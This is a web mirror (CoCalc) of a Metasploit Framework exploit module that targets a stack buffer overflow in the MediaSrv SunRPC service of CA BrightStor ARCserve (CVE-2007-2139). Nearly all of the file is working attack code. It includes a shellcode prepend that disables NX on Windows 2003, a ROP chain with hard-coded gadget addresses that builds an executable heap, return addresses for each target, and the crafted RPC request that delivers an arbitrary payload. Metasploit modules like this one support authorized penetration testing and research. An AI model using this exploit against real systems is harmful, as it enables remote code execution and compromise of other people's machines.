CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::SunRPC

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow',

14
      'Description'    => %q{

15
          This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA

16
        BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker

17
        can overflow a stack buffer and execute arbitrary code.

18
      },

19
      'Author'         => [ 'toto' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2007-2139'],

24
          [ 'OSVDB', '35326' ],

25
          [ 'BID', '23635'],

26
          [ 'ZDI', '07-022'],

27
        ],

28
      'Privileged'     => true,

29
      'Platform'       => 'win',

30
      'Payload'        =>

31
        {

32
          'Space'    => 0x300,

33
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c_",

34
          'Prepend' =>

35
              # Disable NX on 2k3 to upload data on the stack

36
              # (service crashes if the stack is switched to the heap)

37
              "\x64\x8b\x0d\x30\x00\x00\x00"              + # mov ecx, dword ptr fs:[0x30] ; PEB

38
              "\x83\xb9\xa4\x00\x00\x00\x05"              + # cmp dword ptr [ecx+0xa4], 5  ; MajorVersion == 5

39
              "\x75\x30"                                  + # jnz after

40
              "\x83\xb9\xa8\x00\x00\x00\x02"              + # cmp dword ptr [ecx+0xa8], 2  ; MinorVersion == 2

41
              "\x75\x27"                                  + # jnz after

42
              "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00"  + # cmp dword ptr [ecx+0xac], 0xece  ; BuildVersion (> SP0)

43
              "\x76\x1b"                                  + # jbe after

44
              "\x8d\x89\xa8\x00\x00\x00"                  + # lea ecx, [ecx+0xa8]

45
              "\xba\x00\x03\xfe\x7f"                      + # mov edx, 0x7ffe0300

46
              "\xb8\xed\x00\x00\x00"                      + # mov eax, 0xed

47
              "\x6a\x04"                                  + # push 4

48
              "\x51"                                      + # push ecx

49
              "\x6a\x22"                                  + # push 22

50
              "\x6a\xff"                                  + # push -1

51
              "\x6a\xff"                                  + # push -1 (padding)

52
              "\xff\x12",                                   # call dword ptr[edx]

53
          'StackAdjustment' => -10000,

54


55
        },

56
      'Targets'        =>

57
        [

58
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)', { 'Ret' => 0x1002b715 , 'Off' => 0x304} ],

59
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)', { 'Ret' => 0x1002b715 , 'Off' => 0x300} ],

60
          ['BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)', { 'Ret' => 0x41414141 } ],

61
        ],

62
      'DisclosureDate' => '2007-04-25',

63
      'DefaultTarget' => 0

64
    ))

65
  end

66


67
  def exploit

68
    sunrpc_create('tcp', 0x6097e, 1)

69


70
    if target.name =~ /NX/

71
      # summary:

72
      #

73
      # 1) get the payload address

74
      # 2) copy the payload into a fixed buffer (data section)

75
      # 3) allocate an executable heap buffer (to bypass NX)

76
      # 4) copy back the payload into the heap

77
      # 5) jmp to the payload in the heap

78
      #

79
      # step 1: jmp arround the atoi pointers

80
      #

81
      # add esp, 20h

82
      # retn

83
      #

84
      # step 2: get a pointer to the stack in ecx

85
      #

86
      # xor eax, eax

87
      # mov ecx, dword ptr fs:[0]

88
      # cmp dword ptr [ecx+4], offset __unwind_handler

89
      # jnz end

90
      # [...]

91
      # end:

92
      # retn

93
      #

94
      # step 3: mov the stack pointer in eax

95
      #

96
      # mov eax, ecx

97
      # add esp, 20h

98
      # retn

99
      #

100
      # step 4: set fffff824h in esi

101
      #

102
      # pop esi

103
      # retn

104
      #

105
      # step 5: add esi to eax (eax points to the payload in the stack)

106
      #

107
      # add eax, esi

108
      # pop esi

109
      # retn

110
      #

111
      # step 6: set edi to a buffer we can write (6d515301h)

112
      #

113
      # pop edi

114
      # retn

115
      #

116
      # step 7: copy the payload to the buffer

117
      #

118
      # push eax

119
      # push 	edi

120
      # call _strcpy_0

121
      # pop ecx

122
      # pop ecx

123
      # retn

124
      #

125
      # step 8: set ecx to ffffffh

126
      #

127
      # pop ecx

128
      # retn

129
      #

130
      # step 9: mov ecx to eax (ffffffff -> MEM_EXECUTABLE)

131
      #

132
      # mov eax, ecx

133
      # add esp, 20h

134
      # retn

135
      #

136
      # step 10: create an executable heap

137
      #

138
      # push 0

139
      # cmp [esp+4+arg_0], eax

140
      # push 1000h

141
      # setz al

142
      # push eax

143
      # call ds:HeapCreate    ; create a new heap (executable for NX)

144
      # test eax, eax

145
      # mov hHeap, eax

146
      # jz short loc_6d5071b5

147
      # call ___sbh_heap_init

148
      # test eax, eax

149
      # jnz short loc_6d5071b8

150
      # push hHeap

151
      # call ds:HeapDestroy

152
      # loc_6d5071b5:

153
      # xor eax, eax

154
      # retn

155
      # loc_6d5071b8:

156
      # push 1

157
      # pop eax

158
      # retn

159
      #

160
      # step 11: Allocate a new heap buffer (size 01060101h)

161
      #

162
      # push hHeap

163
      # call ds:HeapAlloc

164
      # pop edi

165
      # pop esi

166
      # retn

167
      #

168
      # step 12: set esi to the buffer containing the payload  (6d515301h)

169
      #

170
      # pop esi

171
      # retn

172
      #

173
      # step 13: copy the payload to the heap (executable)

174
      #

175
      # push esi

176
      # push eax

177
      # call _strcpy_0

178
      # pop ecx

179
      # pop ecx

180
      # pop esi

181
      # retn

182
      #

183
      # step 14: go to the heap

184
      #

185
      # call eax

186
      #

187
      # step 15:

188
      # if 2k3 the prepend data disables NX to upload and execute

189
      # data on the stack

190
      #

191
      # step 16: w00t!

192


193
      data = Rex::Text.rand_text_alphanumeric(0x600)

194


195
      # ret 1

196
      data[ 0x100, 4 ] = [ 0x6d5010e4 ].pack('V')

197


198
      # used to store the result of atoi

199
      data[ 0x108, 4 ] = [ 0x6d51652b ].pack('V')

200
      data[ 0x10C, 4 ] = [ 0x6d51652b ].pack('V')

201
      data[ 0x110, 4 ] = [ 0x6d51652b ].pack('V')

202
      data[ 0x114, 4 ] = [ 0x6d51652b ].pack('V')

203
      data[ 0x118, 4 ] = [ 0x6d51652b ].pack('V')

204
      data[ 0x11C, 4 ] = [ 0x6d51652b ].pack('V')

205


206
      # ret 2

207
      data[ 0x124, 4 ] = [ 0x6d50b27a ].pack('V')

208


209
      # ret 3

210
      data[ 0x128, 4 ] = [ 0x6d5010e2 ].pack('V')

211


212
      # ret 4

213
      data[ 0x14C, 4 ] = [ 0x6d50aa6d ].pack('V')

214
      data[ 0x150, 4 ] = [ 0xfffff824 ].pack('V')

215


216
      # ret 5

217
      data[ 0x154, 4 ] = [ 0x6d50aa6b ].pack('V')

218


219
      # ret 6

220
      data[ 0x15C, 4 ] = [ 0x6d5057a0 ].pack('V')

221
      data[ 0x160, 4 ] = [ 0x6d515301 ].pack('V')

222


223
      # ret 7

224
      data[ 0x164, 4 ] = [ 0x6d50b938 ].pack('V')

225


226
      # ret 8

227
      data[ 0x178, 4 ] = [ 0x6d502df0 ].pack('V')

228
      data[ 0x17C, 4 ] = [ 0xffffffff ].pack('V')

229


230
      # ret 9

231
      data[ 0x180, 4 ] = [ 0x6d5010e2 ].pack('V')

232


233
      # ret 10

234
      data[ 0x1a4, 4 ] = [ 0x6d507182 ].pack('V')

235


236
      # ret 11

237
      data[ 0x1a8, 4 ] = [ 0x6d505c2c ].pack('V')

238
      data[ 0x1ac, 4 ] = [ 0xffffffff ].pack('V')

239
      data[ 0x1b0, 4 ] = [ 0x01060101 ].pack('V')

240


241
      # ret 12

242
      data[ 0x1bc, 4 ] = [ 0x6d50aa6d ].pack('V')

243
      data[ 0x1c0, 4 ] = [ 0x6d515301 ].pack('V')

244


245
      # ret 13

246
      data[ 0x1c4, 4 ] = [ 0x6d50f648 ].pack('V')

247


248
      # ret 14

249
      data[ 0x1cc, 4 ] = [ 0x6d506867 ].pack('V')

250


251
      data[ 0x260 , payload.encoded.length ] = payload.encoded

252


253
    else

254
      data = Rex::Text.rand_text_alphanumeric(0xA64)

255
      off = target['Off']

256


257
      data[ off, payload.encoded.length] = payload.encoded

258
      data[ off + 0x73c, 2 ] = "\xeb\x06"

259
      data[ off + 0x740, 4 ] = [ target.ret ].pack('V')

260
      data[ off + 0x744, 5 ] = "\xe9\xb7\xf8\xff\xff"

261
    end

262


263
    data = "_" + data + "_1_1_1_1_1_1_1_1_1"

264


265
    request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)

266


267
    print_status("Trying target #{target.name}...")

268


269
    begin

270
      ret = sunrpc_call(0xf5, request)

271
      select(nil,nil,nil,20)

272
    rescue

273
    end

274


275
    sunrpc_destroy

276


277
    handler

278
    disconnect

279


280
  end

281
end

282


283